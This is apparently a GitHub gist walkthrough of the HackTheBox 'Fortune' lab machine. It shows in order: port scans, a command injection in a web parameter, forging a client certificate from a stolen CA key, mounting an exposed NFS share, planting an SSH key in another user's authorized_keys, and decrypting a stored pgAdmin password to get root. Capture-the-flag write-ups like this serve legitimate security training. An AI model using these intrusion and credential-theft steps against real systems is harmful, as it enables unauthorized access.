Skip to content

Instantly share code, notes, and snippets.

@3rg1s

3rg1s/Fortune.md

Last active October 30, 2019 13:06
Show Gist options
  • Save 3rg1s/cc5730b6bd87f535711d9ccb97566627 to your computer and use it in GitHub Desktop.
Save 3rg1s/cc5730b6bd87f535711d9ccb97566627 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
Fortune.md

Hackthebox Fortune🥠

Reconnaissance

From nmap ports 22, 80, 443 are open

root@kali:~# nmap -sC -sV 10.10.10.127
Starting Nmap 7.60 ( https://nmap.org ) at 2019-05-14 22:07 EEST
Nmap scan report for 10.10.10.127
Host is up (0.16s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE    VERSION
22/tcp  open  ssh        OpenSSH 7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 07:ca:21:f4:e0:d2:c6:9e:a8:f7:61:df:d7:ef:b1:f4 (RSA)
|   256 30:4b:25:47:17:84:af:60:e2:80:20:9d:fd:86:88:46 (ECDSA)
|_  256 93:56:4a:ee:87:9d:f6:5b:f9:d9:25:a6:d8:e0:08:7e (EdDSA)
80/tcp  open  http       OpenBSD httpd
|_http-server-header: OpenBSD httpd
|_http-title: Fortune
443/tcp open  ssl/https?
|_ssl-date: TLS randomness does not represent time

Website port 80

The db parameter is vulnerable to command injection, by adding ;{command} to the parameter db.

rce_on_db_parameter

Reverse shell isn't possible from here. Two juicy files are located at /home/bob/ca/intermediate/certs/intermediate.cert.pem and /home/bob/ca/intermediate/private/intermediate.key.pem. The first file is a certification file which includes the public certification of a website. And the second one is the private key of that. Having those files I created a pk12 certification.

root@kali:~# openssl req -newkey rsa:4096 -keyout alice_key.pem -out alice_csr.pem -nodes -days 365 -subj "/CN=Alice"
root@kali:~# openssl x509 -req -in alice_csr.pem -CA intermediate.cert.pem -CAkey intermediate.key.pem -out alice_cert.pem -set_serial 01 -days 365
root@kali:~# openssl pkcs12 -export -clcerts -in intermediate.cert.pem -inkey intermediate.key.pem -out alice.p12

Website port 443

At first it gives an error, but after importing the alice.p12 there is some progress. Click generate and

Website port 443

Using the private key to access the ssh port as nfsuser(found inside /etc/passwd) root@kali:~# chmod 600 priv.key root@kali:~# ssh -i nfsuser.priv nfsuser@10.10.10.127

Port 2049 is open now

root@kali:~# nmap 10.10.10.127

Starting Nmap 7.60 ( https://nmap.org ) at 2019-05-15 00:41 EEST
Nmap scan report for 10.10.10.127
Host is up (0.11s latency).
Not shown: 992 closed ports
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
111/tcp  open     rpcbind
443/tcp  open     https
1947/tcp filtered sentinelsrm
2049/tcp open     nfs
6668/tcp filtered irc
8081/tcp open     blackice-icecap

Nmap done: 1 IP address (1 host up) scanned in 20.79 seconds

Enumerating nfs mounts

root@kali:# showmount -e 10.10.10.127
Export list for 10.10.10.127:
/home (everyone)

Mounting /home folder

root@kali:# mkdir /tmp/home/ && mount 10.10.10.127:/home/ /tmp/home/

Sshing to charlie

Having rw permissions to charlie folder, I upload my private ssh key and get ssh access as charlie user.

root@kali:/tmp/home# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/fuxsocy/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/fuxsocy/.ssh/id_rsa.
Your public key has been saved in /home/fuxsocy/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:fW1/G5sQAc0x4l/0A/0MlkaH1X1bkLxfyHZETD7c76o root@kali
The key's randomart image is:
+---[RSA 2048]----+
|           oo*=@B|
|          . oo&+X|
|           . = @O|
|         .  ..B.O|
|        S . .+ooo|
|           . ..o.|
|             . .+|
|              ..*|
|            E..+ |
+----[SHA256]-----+

root@kali:# cat /home/fuxsocy/.ssh/id_rsa.pub >> /tmp/home/charlie/.ssh/authorized_keys
root@kali:# ssh -i /home/fuxsocy/.ssh/id_rsa charlie@10.10.10.127

Last login: Tue May 14 16:52:51 2019 from 10.10.16.86
OpenBSD 6.4 (GENERIC) #349: Thu Oct 11 13:25:13 MDT 2018

Welcome to OpenBSD: The proactively secure Unix-like operating system.
fortune$

Privilage escalation

A file called mbox contains

fortune$ cat mbox                                                                                                                                                       
From bob@fortune.htb Sat Nov  3 11:18:51 2018
Return-Path: <bob@fortune.htb>
Delivered-To: charlie@fortune.htb
Received: from localhost (fortune.htb [local])
       by fortune.htb (OpenSMTPD) with ESMTPA id bf12aa53
       for <charlie@fortune.htb>;
       Sat, 3 Nov 2018 11:18:51 -0400 (EDT)
From:  <bob@fortune.htb>
Date: Sat, 3 Nov 2018 11:18:51 -0400 (EDT)
To: charlie@fortune.htb
Subject: pgadmin4
Message-ID: <196699abe1fed384@fortune.htb>
Status: RO

Hi Charlie,

Thanks for setting-up pgadmin4 for me. Seems to work great so far.
BTW: I set the dba password to the same as root. I hope you don't mind.

Cheers,

Bob

fortune$

Finding the db file and decrypting the password

On /var/appsrv/pgadmin4/ is a file pgadmin4.db which has An enrypted string {utUU0jkamCZDmqFLOrAuPjFxL0zp8zWzISe5MF0GY/l8Silrmu3caqrtjaVjLQlvFFEgESGz} and an encrypted key. {$pbkdf2-sha512$25000$z9nbm1Oq9Z5TytkbQ8h5Dw$Vtx9YWQsgwdXpBnsa8BtO5kLOdQGflIZOQysAy7JdTVcRbv/6csQHAJCAIJT9rLFBawClFyMKnqKNL5t3Le9vg}

Adding print decrypt("utUU0jkamCZDmqFLOrAuPjFxL0zp8zWzISe5MF0GY/l8Silrmu3caqrtjaVjLQlvFFEgESGz","$pbkdf2-sha512$25000$z9nbm1Oq9Z5TytkbQ8h5Dw$Vtx9YWQsgwdXpBnsa8BtO5kLOdQGflIZOQysAy7JdTVcRbv/6csQHAJCAIJT9rLFBawClFyMKnqKNL5t3Le9vg") at the end of the file crypto.py file located at /usr/local/pgadmin4/pgadmin4-3.4/web/pgadmin/utils/crypto.py we can decrypt the the encrypted string.

root@kali:# python crypto.py
R3us3-0f-a-P4ssw0rdl1k3th1s?_B4D.ID3A!
None

Root Shell

fortune$ su -
Password:
fortune# 
fortune# cat /home/charlie/user.txt
ada0a[redacted]
fortune# cat /root/root.txt        
335af[redacted]
fortune#
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment